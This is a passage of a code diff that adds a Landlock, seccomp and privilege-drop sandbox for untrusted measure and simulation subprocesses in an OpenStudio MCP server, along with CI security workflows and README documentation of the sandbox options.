diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 6ffc936..fe15393 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -92,14 +92,15 @@ jobs: retention-days: 1 arm64-test: - # Start of arm64 test matrix: shard 1 only (real EnergyPlus sim via SEB4 OSW, - # asserts EUI ≈ 1.875 ± 2%). Expand to [1..5] once arm64 sim parity is proven. + # arm64 test matrix: shard 1 = real EnergyPlus sim via SEB4 OSW (asserts EUI + # ≈ 1.875 ± 2%) + weather/loops; shard 2 = the arch-sensitive set (SWIG/stdout + # deb-vs-wheel, measure exec/bundler, an HVAC sim). Both run confined (auto). needs: arm64-build runs-on: ubuntu-24.04-arm strategy: fail-fast: false matrix: - shard: [1] + shard: [1, 2] steps: - uses: actions/checkout@v4 @@ -115,6 +116,9 @@ jobs: env: RUN_OPENSTUDIO_INTEGRATION: "1" MCP_SERVER_CMD: "openstudio-mcp" + # Run the integration suite confined (explicit, not via the code default). + # Measures/sims drop to the unprivileged sandbox uid + Landlock + seccomp. + OSMCP_SANDBOX: "auto" run: | mkdir -p runs case ${{ matrix.shard }} in @@ -123,10 +127,19 @@ jobs: FILES="tests/test_example_workflows.py tests/test_component_properties.py tests/test_comstock.py tests/test_weather.py tests/test_weather_files.py tests/test_mcp_seb4.py tests/test_create_constructions.py tests/test_loop_operations.py tests/test_plant_loop_demand.py tests/test_sizing_properties.py tests/test_skill_retrofit.py tests/test_integration.py" EXTRA_ENV="-e MCP_OSW_PATH=tests/assets/SEB_model/SEB4_baseboard/workflow.osw -e EXPECTED_EUI=1.8750760248144998 -e EXPECTED_EUI_RTOL=0.02 -e EXPECTED_EUI_ATOL=0.0" ;; + 2) + # arm64 arch-sensitive coverage (the deb-vs-wheel / native-ISA risks): + # - SWIG memleak + stdout suppression (wheel-vs-deb behaviour) + # - measure apply + authoring (Ruby/Python exec + bundler on arm64) + # - an HVAC EnergyPlus sim (arm64 E+ build correctness) + # (The sandbox/security PoC runs on arm64 via the security workflow.) + FILES="tests/test_swig_memleak_cleanup.py tests/test_stdout_logger_silence.py tests/test_measures.py tests/test_measure_authoring.py tests/test_hvac_supply_sim.py" + EXTRA_ENV="" + ;; esac docker run --rm \ -v "$PWD:/repo" -v "$PWD/runs:/runs" \ - -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \ + -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \ $EXTRA_ENV \ openstudio-mcp:arm64 bash -lc "cd /repo && pytest -vv -s $FILES" @@ -182,6 +195,9 @@ jobs: env: RUN_OPENSTUDIO_INTEGRATION: "1" MCP_SERVER_CMD: "openstudio-mcp" + # Run the integration suite confined (explicit, not via the code default). + # Measures/sims drop to the unprivileged sandbox uid + Landlock + seccomp. + OSMCP_SANDBOX: "auto" run: | mkdir -p runs case ${{ matrix.shard }} in @@ -215,6 +231,6 @@ jobs: esac docker run --rm \ -v "$PWD:/repo" -v "$PWD/runs:/runs" \ - -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \ + -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \ $EXTRA_ENV \ openstudio-mcp:dev bash -lc "cd /repo && pytest -vv -s $FILES" diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml new file mode 100644 index 0000000..ecb595c --- /dev/null +++ b/.github/workflows/security.yml @@ -0,0 +1,51 @@ +name: security + +# Dedicated workflow for the security / sandbox-confinement suite +# (tests/test_sandbox.py), kept separate from the main `ci` shards so the +# security tests run and report on their own. Runs the full sandbox tier +# (OSMCP_SANDBOX=auto) on BOTH amd64 and arm64 — the seccomp BPF and Landlock +# use arch-specific syscall numbers, so arm64 must be exercised explicitly. +# Individual tests still pin their own mode per fixture (off/posix/auto). + +on: + push: + branches: [feat/measure-exec-sandbox] + pull_request: + workflow_dispatch: + +jobs: + security-tests: + name: security-tests (${{ matrix.arch }}) + runs-on: ${{ matrix.runner }} + strategy: + fail-fast: false + matrix: + include: + - arch: amd64 + runner: ubuntu-latest + dockerfile: docker/Dockerfile + - arch: arm64 + runner: ubuntu-24.04-arm + dockerfile: docker/Dockerfile.arm64 + steps: + - uses: actions/checkout@v4 + + - name: Build image (${{ matrix.arch }}) + run: docker build -f ${{ matrix.dockerfile }} -t openstudio-mcp:dev . + + - name: Run security suite (${{ matrix.arch }}) + env: + RUN_OPENSTUDIO_INTEGRATION: "1" + MCP_SERVER_CMD: "openstudio-mcp" + OSMCP_SANDBOX: "auto" + run: | + mkdir -p runs + FILES=$(ls tests/test_sandbox.py tests/test_security_*.py 2>/dev/null || true) + if [ -z "$FILES" ]; then + echo "No security tests present in this checkout — nothing to run." + exit 0 + fi + echo "[${{ matrix.arch }}] security tests under OSMCP_SANDBOX=$OSMCP_SANDBOX: $FILES" + docker run --rm -v "$PWD:/repo" -v "$PWD/runs:/runs" \ + -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \ + openstudio-mcp:dev bash -lc "cd /repo && pytest -vv $FILES" diff --git a/README.md b/README.md index 178b727..9ed965b 100644 --- a/README.md +++ b/README.md @@ -52,7 +52,7 @@ Add to your Claude Desktop config (`~/Library/Application Support/Claude/claude_ "command": "docker", "args": [ "run", "--rm", "-i", - "-v", "./tests/assets:/inputs", + "-v", "./tests/assets:/inputs:ro", "-v", "./runs:/runs", "-v", "./.claude/skills:/skills:ro", "-e", "OPENSTUDIO_MCP_MODE=prod", @@ -95,6 +95,76 @@ See **[docs/remote-multi-user.md](docs/remote-multi-user.md)** for setup, auth, --- +## Security and simulation sandbox + +OpenStudio measures are Ruby or Python programs and must be treated as untrusted +code. EnergyPlus workflows can also invoke measure code. Docker isolates the +container from the host, while openstudio-mcp adds a second sandbox around the +child processes used by `apply_measure`, `test_measure`, measure metadata +refresh, and simulations. + +The default `OSMCP_SANDBOX=auto` mode provides the following controls on Linux, +including Docker Desktop's Linux VM: + +- **Privilege drop:** child processes run as the image's unprivileged + `sandbox` user (UID/GID 1001), while the MCP server retains only the + privileges needed to prepare run directories. +- **Filesystem policy:** Landlock denies filesystem access by default. The + current run or staged measure directory is writable; required system and + OpenStudio directories are read-only. `/repo`, `/inputs`, and other users' + run directories are not exposed to measure code. +- **Network policy:** seccomp denies outbound IP networking by default. +- **Secret isolation:** child processes receive an allowlisted environment + instead of inheriting API keys, tokens, and other server environment + variables. +- **Process hardening:** `no_new_privs` prevents privilege recovery through + setuid executables. Resource limits constrain generated file size and process + count, and simulations have a wall-clock timeout. +- **Staging:** input models, weather files, measures, and OSWs are copied into a + private run directory before execution. Escaping symlinks are rejected. + +On Linux, `auto` fails closed if Landlock or the seccomp network filter cannot +be installed: the untrusted child process does not run. On native macOS or +Windows without Docker, kernel confinement is unavailable and the server warns +that only environment filtering is active. Use the Docker image when running +untrusted measures. + +### Sandbox options + +| Variable | Default | Behavior | +|----------|---------|----------| +| `OSMCP_SANDBOX` | `auto` | `auto`, `full`, and `landlock` request environment filtering, UID/GID drop, resource limits, Landlock filesystem confinement, and seccomp network denial. `posix` omits Landlock and seccomp. `off` disables child-process confinement and is only appropriate for trusted local code. Unknown values fall back to `auto`. | +| `OSMCP_SANDBOX_NET` | `deny` | `deny` blocks outbound IP networking. `allow` permits it for trusted measures that must fetch external resources. | +| `OSMCP_SANDBOX_UID` / `OSMCP_SANDBOX_GID` | `1001` | Account used for confined child processes. Values less than 1 are rejected. The default matches the `sandbox` user built into the image. | +| `OSMCP_SANDBOX_RLIMIT_FSIZE` | `10737418240` | Maximum size in bytes of one file created by a child process. `0` disables this limit. | +| `OSMCP_SANDBOX_RLIMIT_NPROC` | `1024` | Maximum processes/threads for the sandbox UID. `0` disables this limit. | +| `OSMCP_SANDBOX_RLIMIT_NOFILE` | `0` | Optional open-file descriptor limit. | +| `OSMCP_SANDBOX_RLIMIT_CPU` | `0` | Optional CPU-seconds limit. Disabled by default because annual simulations can be long-running. | +| `OSMCP_SANDBOX_RLIMIT_AS` | `0` | Optional virtual-memory limit. Prefer Docker memory limits because restrictive address-space limits can break EnergyPlus. | +| `OSMCP_SIM_TIMEOUT_SECONDS` | `7200` | Wall-clock timeout for a simulation. `0` disables the timeout. | + +### Secure deployment guidance + +- Mount `/inputs` read-only: `-v /host/inputs:/inputs:ro`. +- Mount only the output directory at `/runs`; any process allowed to write + `/runs` can modify that host directory by design. +- Mount workflow guides read-only at `/skills`, or use the copy already baked + into the image: `-v /host/.claude/skills:/skills:ro`. +- Do not mount the repository, home directory, Docker socket, credentials, or + broad host paths into production containers. The `/repo` source mount in the + testing commands is for development only. +- Keep `OSMCP_SANDBOX=auto` and `OSMCP_SANDBOX_NET=deny` for untrusted measure + authoring. Docker's `--network none` can provide an additional + container-wide network boundary when remote access is not required. +- Use Docker CPU, memory, PID, and disk quotas as outer limits. The in-process + resource limits are defense in depth, not replacements for container limits. + +The sandbox protects the host and other run directories, but it intentionally +allows measure code to modify its own staged run directory. Treat resulting +OSM, SQL, report, and log files as untrusted outputs. + +--- + ## Workflow skills In Claude Code, 12 bundled skills add workflow automation and domain knowledge: diff --git a/docker/Dockerfile b/docker/Dockerfile index 588ec84..528fae0 100644 --- a/docker/Dockerfile +++ b/docker/Dockerfile @@ -7,6 +7,11 @@ RUN apt-get update && apt-get install -y --no-install-recommends \ ca-certificates curl \ && rm -rf /var/lib/apt/lists/* +# Unprivileged account that confined measure/simulation subprocesses drop to +# (see mcp_server/_sandbox_exec.py). The server stays root; only the exec'd +# measure/EnergyPlus child runs as this uid when OSMCP_SANDBOX is enabled. +RUN useradd -r -u 1001 -s /usr/sbin/nologin sandbox + # ComStock measures (openstudio-standards-based templates for space types, # constructions, HVAC, schedules). Only the measures/ directory is kept (~50 MB). ARG COMSTOCK_TAG=2025-3 diff --git a/docker/Dockerfile.arm64 b/docker/Dockerfile.arm64 index 86808b8..929eca9 100644 --- a/docker/Dockerfile.arm64 +++ b/docker/Dockerfile.arm64 @@ -26,6 +26,10 @@ RUN apt-get update && apt-get install -y --no-install-recommends \ ruby-full \ && rm -rf /var/lib/apt/lists/* +# Unprivileged account that confined measure/simulation subprocesses drop to +# (parity with docker/Dockerfile; see mcp_server/_sandbox_exec.py). +RUN useradd -r -u 1001 -s /usr/sbin/nologin sandbox + # OpenStudio arm64 — official NREL .deb. Pulls in libstdc++ etc. as deps. RUN curl -fSL \ "https://github.com/NREL/OpenStudio/releases/download/v${OPENSTUDIO_VERSION}/OpenStudio-${OPENSTUDIO_VERSION}+${OPENSTUDIO_SHA}-Ubuntu-24.04-arm64.deb" \ @@ -40,9 +44,14 @@ RUN curl -fSL \ # The nrel/openstudio base image does this; the .deb does not. Without it, # every measure-based MCP tool fails at runtime (ComStock, common-measures, # apply_measure). Mirrors NREL/docker-openstudio's /var/oscli setup. +# A stable symlink (/usr/local/openstudio-Ruby) is created in the RUN below so +# RUBYLIB can be a fixed ENV — the install dir name carries a build-SHA suffix. +# Both link and target live under /usr/local, which the sandbox Landlock policy +# grants read+exec. RUN OPENSTUDIO_FOLDER=$(find /usr -maxdepth 2 -name "openstudio-${OPENSTUDIO_VERSION}*" -type d | head -n1) \ && test -n "$OPENSTUDIO_FOLDER" || { echo "openstudio install dir not found"; exit 1; } \ && echo "OPENSTUDIO_FOLDER=$OPENSTUDIO_FOLDER" \ + && ln -sfn "$OPENSTUDIO_FOLDER/Ruby" /usr/local/openstudio-Ruby \ && gem install bundler -v ${OS_BUNDLER_VERSION} --no-document \ && gem install zip --no-document \ && mkdir -p /var/oscli \ @@ -53,6 +62,12 @@ RUN OPENSTUDIO_FOLDER=$(find /usr -maxdepth 2 -name "openstudio-${OPENSTUDIO_VER && bundle _${OS_BUNDLER_VERSION}_ install --path=gems --without=native_ext --jobs=4 --retry=3 \ && test -d /var/oscli/gems || { echo "/var/oscli/gems missing after bundle install"; exit 1; } +# Let the system `ruby` resolve `require 'openstudio'` (parity with the amd64 +# nrel/openstudio base, which sets RUBYLIB to the install's Ruby dir). test_measure +# runs Ruby unit tests via `ruby -I .` directly — `openstudio measure -r` does not +# run minitest — so without this the measure tests fail with a LoadError. +ENV RUBYLIB=/usr/local/openstudio-Ruby + # ComStock measures (openstudio-standards-based templates for space types, # constructions, HVAC, schedules). Only the measures/ directory is kept (~50 MB). ARG COMSTOCK_TAG=2025-3 diff --git a/mcp_server/_landlock.py b/mcp_server/_landlock.py new file mode 100644 index 0000000..ae1fcfd --- /dev/null +++ b/mcp_server/_landlock.py @@ -0,0 +1,130 @@ +"""Minimal Landlock (LSM) filesystem confinement via raw syscalls (ctypes). + +Three syscalls, no external dependency (house style: grepable, owned). Applies a +read-deny-by-default policy to the current process and all its children: only the +enumerated read-only paths are readable/executable, and only the run dir is +writable. Requires no_new_privs (set by the caller) for unprivileged use; works +inside default-seccomp Docker >= 23.0 (the landlock_* syscalls are allowlisted +there). Returns the applied ABI, or 0 when Landlock is unavailable — the caller +degrades loudly rather than failing the run. +""" +from __future__ import annotations + +import ctypes +import os +import stat + +# Generic syscall table numbers (identical on x86_64 and aarch64). +_NR_CREATE_RULESET = 444 +_NR_ADD_RULE = 445 +_NR_RESTRICT_SELF = 446 + +_CREATE_RULESET_VERSION = 1 # query the ABI instead of creating a ruleset +_RULE_PATH_BENEATH = 1 + +# access_fs rights (bit positions). 0..12 = ABI 1, REFER = ABI 2, TRUNCATE = ABI 3. +_A_EXECUTE = 1 << 0 +_A_WRITE_FILE = 1 << 1 +_A_READ_FILE = 1 << 2 +_A_READ_DIR = 1 << 3 +_A_REMOVE_DIR = 1 << 4 +_A_REMOVE_FILE = 1 << 5 +_A_MAKE_CHAR = 1 << 6 +_A_MAKE_DIR = 1 << 7 +_A_MAKE_REG = 1 << 8 +_A_MAKE_SOCK = 1 << 9 +_A_MAKE_FIFO = 1 << 10 +_A_MAKE_BLOCK = 1 << 11 +_A_MAKE_SYM = 1 << 12 +_A_REFER = 1 << 13 # ABI >= 2 +_A_TRUNCATE = 1 << 14 # ABI >= 3 +_A_IOCTL_DEV = 1 << 15 # ABI >= 5 — governs ioctl() on device files + +_RO = _A_EXECUTE | _A_READ_FILE | _A_READ_DIR +_RW_BASE = ( + _A_EXECUTE | _A_WRITE_FILE | _A_READ_FILE | _A_READ_DIR + | _A_REMOVE_DIR | _A_REMOVE_FILE | _A_MAKE_CHAR | _A_MAKE_DIR | _A_MAKE_REG + | _A_MAKE_SOCK | _A_MAKE_FIFO | _A_MAKE_BLOCK | _A_MAKE_SYM +) +# Rights that are meaningful on a non-directory. Landlock's add_rule returns +# EINVAL if a rule on a FILE carries directory-only rights (READ_DIR, MAKE_*, +# REMOVE_*), so a per-file rule (e.g. /dev/null) MUST be masked to these. +_FILE_ONLY = _A_EXECUTE | _A_WRITE_FILE | _A_READ_FILE | _A_TRUNCATE | _A_IOCTL_DEV + + +class _RulesetAttr(ctypes.Structure): + # Only handled_access_fs — 8 bytes, valid on every ABID (kernel reads the + # field set implied by `size`); avoids the ABI>=4 net field tripping abi3. + _fields_ = [("handled_access_fs", ctypes.c_uint64)] + + +class _PathBeneathAttr(ctypes.Structure): + # MUST be packed (12 bytes). The kernel UAPI declares + # struct landlock_path_beneath_attr { __u64 allowed_access; __s32 parent_fd; } + # __attribute__((packed)); + # so _pack_=1 matches the kernel exactly. Do NOT "fix" this to natural + # alignment (16 bytes) — that would mismatch the kernel struct. Verified by + # the integration tests, which only pass if add_rule parsed this correctly. + _pack_ = 1 + _fields_ = [("allowed_access", ctypes.c_uint64), ("parent_fd", ctypes.c_int32)] + + +def restrict(ro_paths: list[str], rw_paths: list[str]) -> int: + """Confine the filesystem to ro_paths (read+exec) and rw_paths (read+write). + + Returns the applied Landlock ABI (>=1), or 0 if Landlock is unavailable or + the ruleset could not be enforced. Missing paths are skipped silently. + """ + libc = ctypes.CDLL("libc.so.6", use_errno=True) + + abi = libc.syscall(_NR_CREATE_RULESET, None, 0, _CREATE_RULESET_VERSION) + if abi <= 0: + return 0 + + handled = _RW_BASE + if abi >= 2: + handled |= _A_REFER + if abi >= 3: + handled |= _A_TRUNCATE + if abi >= 5: + handled |= _A_IOCTL_DEV # govern device ioctls (esp. with /dev writable) + + attr = _RulesetAttr(handled_access_fs=handled) + rs_fd = libc.syscall(_NR_CREATE_RULESET, ctypes.byref(attr), ctypes.sizeof(attr), 0) + if rs_fd < 0: + return 0 + + def _add(path: str, access: int) -> bool: + """True if the path is absent (optional, skip) or its rule was added; + False only if a PRESENT path's rule failed (a broken ruleset).""" + try: + fd = os.open(path, os.O_PATH | os.O_CLOEXEC) + except OSError: + return True # absent path — optional, not a failure + try: + acc = access & handled + # A rule on a non-directory (e.g. /dev/null) must carry only file + # rights — dir-only bits make add_rule fail with EINVAL. + if not stat.S_ISDIR(os.fstat(fd).st_mode): + acc &= _FILE_ONLY + pba = _PathBeneathAttr(allowed_access=acc, parent_fd=fd) + return libc.syscall(_NR_ADD_RULE, rs_fd, _RULE_PATH_BENEATH, ctypes.byref(pba), 0) == 0 + finally: + os.close(fd) + + ok = True + for p in ro_paths: + ok = _add(p, _RO) and ok + for p in rw_paths: + ok = _add(p, handled) and ok # full set for the writable run dir + if not ok: + # A present path's rule was rejected → enforce nothing rather than a + # half-applied policy; the caller (auto tier) fails closed on a 0 return. + os.close(rs_fd) + return 0 + + # no_new_privs is set by the caller; restrict_self enforces the ruleset on + # this process and everything it execs/forks. + rc = libc.syscall(_NR_RESTRICT_SELF, rs_fd, 0) + os.close(rs_fd) + return abi if rc == 0 else 0 diff --git a/mcp_server/_sandbox_exec.py b/mcp_server/_sandbox_exec.py new file mode 100644 index 0000000..36eb1e3 --- /dev/null +++ b/mcp_server/_sandbox_exec.py @@ -0,0 +1,126 @@ +"""Privilege-dropping exec shim for confined measure / simulation subprocesses. + +Invoked by mcp_server.sandbox.wrap_cmd as:: + + python3 -m mcp_server._sandbox_exec --uid N --gid N \ + [--rlimit-fsize BYTES] [--rlimit-nproc N] [--rlimit-nofile N] \ + [--rlimit-cpu SECONDS] [--rlimit-as BYTES] \ + [--landlock-ro PATH ...] [--landlock-rw PATH ...] [--seccomp-net] \ + -- CMD [ARG...] + +Applies, in order: rlimits, ``prctl(no_new_privs)``, Landlock FS policy and a +seccomp network-deny filter (when their flags are given), then drops to the +unprivileged uid/gid **only when running as root** (a non-root local server keeps +its uid — the FS/network confinement is unprivileged and still applies), and +finally ``execvp``s CMD. A standalone exec — NOT a Popen ``preexec_fn`` — so +there is no fork-safety hazard in the threaded server, and the exec'd image keeps +the same pid (so the dispatcher's terminate/kill-by-pid path still works). +""" +from __future__ import annotations + +import argparse +import ctypes +import os +import resource +import sys + +# Imported up-front (before any Landlock restriction is applied below) so the +# module files are read while the filesystem is still unconfined. +from mcp_server import _landlock, _seccomp + +_RLIMITS = { + "cpu": resource.RLIMIT_CPU, # CPU-seconds + "fsize": resource.RLIMIT_FSIZE, # max single-file bytes + "nproc": resource.RLIMIT_NPROC, # processes/threads for the uid + "nofile": resource.RLIMIT_NOFILE, # open file descriptors + "as": resource.RLIMIT_AS, # virtual address space bytes +} + +_PR_SET_NO_NEW_PRIVS = 38 + + +def _set_no_new_privs() -> None: + """Promise the kernel we will never gain privileges via setuid binaries. + + Prerequisite for the unprivileged Landlock/seccomp backends landing next; set + here so the contract holds from the POSIX tier onward. + """ + libc = ctypes.CDLL("libc.so.6", use_errno=True) + if libc.prctl(_PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0: + raise OSError(ctypes.get_errno(), "prctl(PR_SET_NO_NEW_PRIVS) failed") + + +def main(argv: list[str]) -> int: + if "--" not in argv: + print("sandbox-exec: missing '-- CMD'", file=sys.stderr) + return 2 + sep = argv.index("--") + cmd = argv[sep + 1:] + if not cmd: + print("sandbox-exec: empty command", file=sys.stderr) + return 2 + + ap = argparse.ArgumentParser(add_help=False) + ap.add_argument("--uid", type=int, required=True) + ap.add_argument("--gid", type=int, required=True) + for name in _RLIMITS: + ap.add_argument(f"--rlimit-{name}", type=int, default=0) + ap.add_argument("--landlock-ro", action="append", default=[]) + ap.add_argument("--landlock-rw", action="append", default=[]) + ap.add_argument("--seccomp-net", action="store_true") + ns = ap.parse_args(argv[:sep]) + + # rlimits first, while still privileged (lowering hard limits is always ok). + for name, res_id in _RLIMITS.items(): + val = getattr(ns, f"rlimit_{name}") + if val and val > 0: + try: + resource.setrlimit(res_id, (val, val)) + except (ValueError, OSError) as e: + print(f"sandbox-exec: rlimit {name}={val} failed: {e}", file=sys.stderr) + + _set_no_new_privs() + + # Filesystem + network confinement (after no_new_privs, before the uid drop; + # both persist across setuid + exec and are inherited by children). Degrade + # loudly — a backend that cannot engage prints a notice and the run proceeds + # with whatever confinement did apply (the POSIX floor always holds). + # Fail CLOSED: if a kernel backend was requested (auto/full tier) but cannot + # engage, refuse to run rather than execute untrusted code unconfined. An + # operator who knowingly wants weaker confinement selects OSMCP_SANDBOX=posix + # (UID drop + rlimits, no kernel FS/net) or off — neither requests these flags. + if (ns.landlock_ro or ns.landlock_rw) and not _landlock.restrict(ns.landlock_ro, ns.landlock_rw): + print("sandbox-exec: FATAL Landlock requested but unavailable — refusing to run " + "unconfined (use OSMCP_SANDBOX=posix or off to accept weaker confinement)", + file=sys.stderr) + return 3 + if ns.seccomp_net and not _seccomp.install_net_deny(): + print("sandbox-exec: FATAL seccomp net-deny requested but unavailable — refusing to " + "run unconfined (use OSMCP_SANDBOX=posix or off)", file=sys.stderr) + return 3 + + # Drop privileges only when we have them (root). The FS/network confinement + # above is unprivileged and already applied — so a non-root local server still + # gets Landlock + seccomp + rlimits; only the uid-drop (a defence-in-depth / + # multi-tenant layer) is skipped. Order matters: groups, gid, then uid. + if os.geteuid() == 0: + os.setgroups([ns.gid]) + os.setgid(ns.gid) + os.setuid(ns.uid) + if os.getuid() != ns.uid or os.geteuid() != ns.uid: + print("sandbox-exec: uid drop did not stick", file=sys.stderr) + return 2 + elif os.getuid() != ns.uid: + print(f"sandbox-exec: not root (uid {os.getuid()}) — keeping uid; " + "FS/network confinement still applied", file=sys.stderr) + + try: + os.execvp(cmd[0], cmd) # noqa: S606 - intentional shell-less exec of the confined command + except OSError as e: + print(f"sandbox-exec: exec {cmd[0]} failed: {e}", file=sys.stderr) + return 127 + return 0 # unreachable + + +if __name__ == "__main__": + sys.exit(main(sys.argv[1:])) diff --git a/mcp_server/_seccomp.py b/mcp_server/_seccomp.py new file mode 100644 index 0000000..f80342c --- /dev/null +++ b/mcp_server/_seccomp.py @@ -0,0 +1,111 @@ +"""Minimal seccomp-BPF network deny via raw syscalls (ctypes), no dependency. + +Installs a classic-BPF seccomp filter that fails ``socket(AF_INET|AF_INET6, ...)`` +with EAFNOSUPPORT and leaves AF_UNIX (and every other syscall) untouched — +blocking outbound IP networking from measure code while local IPC / the bundler +still work. The program is built for the running arch (the shim executes on the +workload's arch), so there is no cross-arch branching to get wrong; an unexpected +arch makes install a no-op. Requires no_new_privs (set by the caller). + +Returns True if the filter was installed, False if unavailable — the caller +degrades loudly rather than failing the run. +""" +from __future__ import annotations + +import ctypes +import errno +import platform +import struct + +# BPF opcodes +_BPF_LD_W_ABS = 0x00 | 0x00 | 0x20 # BPF_LD | BPF_W | BPF_ABS +_BPF_JEQ_K = 0x05 | 0x10 | 0x00 # BPF_JMP | BPF_JEQ | BPF_K +_BPF_JSET_K = 0x05 | 0x40 | 0x00 # BPF_JMP | BPF_JSET | BPF_K (bit test) +_BPF_RET_K = 0x06 | 0x00 # BPF_RET | BPF_K + +# seccomp return actions +_SECCOMP_RET_ALLOW = 0x7FFF0000 +_SECCOMP_RET_ERRNO = 0x00050000 +_SECCOMP_RET_KILL_PROCESS = 0x80000000 +_X32_SYSCALL_BIT = 0x40000000 # x86_64 x32 ABI marks syscall nrs with this bit + +# seccomp_data field offsets (nr@0, arch@4, ip@8, args[0]@16 ...; little-endian) +_OFF_NR = 0 +_OFF_ARCH = 4 +_OFF_ARG0 = 16 + +# AUDIT_ARCH + syscall numbers per arch. io_uring_setup is blocked too: io_uring +# can create/connect sockets via submission-queue ops, bypassing a socket()-only +# filter — denying its setup closes that hole (no measure legitimately uses it). +_AUDIT_ARCH = {"x86_64": 0xC000003E, "aarch64": 0xC00000B7} +_NR_SOCKET = {"x86_64": 41, "aarch64": 198} +_NR_IO_URING_SETUP = {"x86_64": 425, "aarch64": 425} # generic syscall number + +_AF_INET = 2 +_AF_INET6 = 10 + +_PR_SET_SECCOMP = 22 +_SECCOMP_MODE_FILTER = 2 + + +def _stmt(code: int, k: int) -> bytes: + return struct.pack("=HBBI", code, 0, 0, k) + + +def _jump(code: int, k: int, jt: int, jf: int) -> bytes: + return struct.pack("=HBBI", code, jt, jf, k) + + +class _SockFprog(ctypes.Structure): + _fields_ = [("len", ctypes.c_ushort), ("filter", ctypes.c_void_p)] + + +def install_net_deny() -> bool: + mach = platform.machine() + if mach not in _AUDIT_ARCH: + return False + audit_arch = _AUDIT_ARCH[mach] + nr_socket = _NR_SOCKET[mach] + nr_io_uring = _NR_IO_URING_SETUP[mach] + deny_net = _SECCOMP_RET_ERRNO | (errno.EAFNOSUPPORT & 0xFFFF) + deny_enosys = _SECCOMP_RET_ERRNO | (errno.ENOSYS & 0xFFFF) # io_uring "unavailable" + + # Instruction layout (jt/jf are offsets from the NEXT instruction). Unexpected + # architectures (e.g. a 32-bit i386 binary, different AUDIT_ARCH) and x32-ABI + # syscalls (x86_64 syscall nr with the 0x40000000 bit) are KILLed rather than + # allowed — otherwise they'd issue unfiltered socket() calls (fail-open). + # 0 load arch + # 1 arch == ours ? -> 2 : KILL(9) + # 2 load nr + # 3 nr & x32_bit ? -> KILL(9) : 4 + # 4 nr == io_uring_setup ? -> ENOSYS(10) : 5 + # 5 nr == socket ? -> 6 : ALLOW(12) + # 6 load args[0] (domain) + # 7 domain == AF_INET ? -> DENY_NET(11): 8 + # 8 domain == AF_INET6 ? -> DENY_NET(11): ALLOW(12) + # 9 RET kill + # 10 RET enosys + # 11 RET deny_net (EAFNOSUPPORT) + # 12 RET allow + program = b"".join([ + _stmt(_BPF_LD_W_ABS, _OFF_ARCH), + _jump(_BPF_JEQ_K, audit_arch, 0, 7), + _stmt(_BPF_LD_W_ABS, _OFF_NR), + _jump(_BPF_JSET_K, _X32_SYSCALL_BIT, 5, 0), + _jump(_BPF_JEQ_K, nr_io_uring, 5, 0), + _jump(_BPF_JEQ_K, nr_socket, 0, 6), + _stmt(_BPF_LD_W_ABS, _OFF_ARG0), + _jump(_BPF_JEQ_K, _AF_INET, 3, 0), + _jump(_BPF_JEQ_K, _AF_INET6, 2, 3), + _stmt(_BPF_RET_K, _SECCOMP_RET_KILL_PROCESS), + _stmt(_BPF_RET_K, deny_enosys), + _stmt(_BPF_RET_K, deny_net), + _stmt(_BPF_RET_K, _SECCOMP_RET_ALLOW), + ]) + n = len(program) // 8 + buf = ctypes.create_string_buffer(program, len(program)) + fprog = _SockFprog(len=n, filter=ctypes.cast(buf, ctypes.c_void_p)) + + libc = ctypes.CDLL("libc.so.6", use_errno=True) + rc = libc.prctl(_PR_SET_SECCOMP, _SECCOMP_MODE_FILTER, ctypes.byref(fprog), 0, 0) + return rc == 0 diff --git a/mcp_server/config.py b/mcp_server/config.py index 4c50bc5..5eff5d4 100644 --- a/mcp_server/config.py +++ b/mcp_server/config.py @@ -1,6 +1,8 @@ from __future__ import annotations +import math import os +import sys from pathlib import Path RUN_ROOT = Path(os.environ.get("OPENSTUDIO_MCP_RUN_ROOT", os.environ.get("OSMCP_RUN_ROOT", "/runs"))).resolve() @@ -14,9 +16,14 @@ def _safe_int(env_val: str, default: int) -> int: def _safe_float(env_val: str, default: float) -> float: try: - return float(env_val) + v = float(env_val) except (ValueError, TypeError): return default + # Reject NaN/inf: a non-finite SIM_TIMEOUT would make both `<= 0` and the + # elapsed-time comparison false, silently disabling timeout enforcement. + if not math.isfinite(v): + return default + return v _raw_concurrency = os.environ.get("OPENSTUDIO_MCP_MAX_CONCURRENCY", os.environ.get("OSMCP_MAX_CONCURRENCY", "1")) MAX_CONCURRENCY = _safe_int(_raw_concurrency, 1) @@ -58,6 +65,109 @@ def _safe_float(env_val: str, default: float) -> float: ENABLE_CODE_MODE = os.environ.get("OSMCP_CODE_MODE", "").lower() in ("1", "true") +# Subprocess confinement for measure/simulation execution (see mcp_server/sandbox.py). +# off — full passthrough (explicit escape hatch for trusted/local-tooling use) +# posix — clean-env allowlist + UID drop (if root) + rlimits +# auto — best confinement available (default): clean-env + Landlock FS + +# seccomp net-deny + rlimits, plus UID drop when running as root. +# Secure by default. Degrades loudly: the unprivileged layers (Landlock/seccomp) +# apply even for a non-root local server; on a platform without a kernel backend +# (macOS/Windows bare installs) it falls back to clean-env only and logs a notice. +_SANDBOX_OFF_ALIASES = frozenset({"", "off", "0", "false", "no"}) +_SANDBOX_ON_MODES = frozenset({"posix", "auto", "full", "landlock"}) + + +def _normalize_sandbox_mode(raw: str) -> str: + """Map OSMCP_SANDBOX to a known mode, FAIL-CLOSED on an unrecognized value. + + A typo like ``atuo`` would otherwise leave ``enabled()`` True but ``_full()`` + False — silently downgrading from the default Landlock+seccomp tier to + posix-only. To never weaken confinement on a typo, force the most-restrictive + ``auto`` and warn loudly. Off-aliases are honored as-is (disabling is explicit). + """ + v = (raw or "").strip().lower() + if v in _SANDBOX_OFF_ALIASES or v in _SANDBOX_ON_MODES: + return v + print(f"[sandbox] unknown OSMCP_SANDBOX={raw!r}; falling back to 'auto' " + "(fail-closed). Valid values: off, posix, auto, full, landlock.", + file=sys.stderr) + return "auto" + + +SANDBOX_MODE = _normalize_sandbox_mode(os.environ.get("OSMCP_SANDBOX", 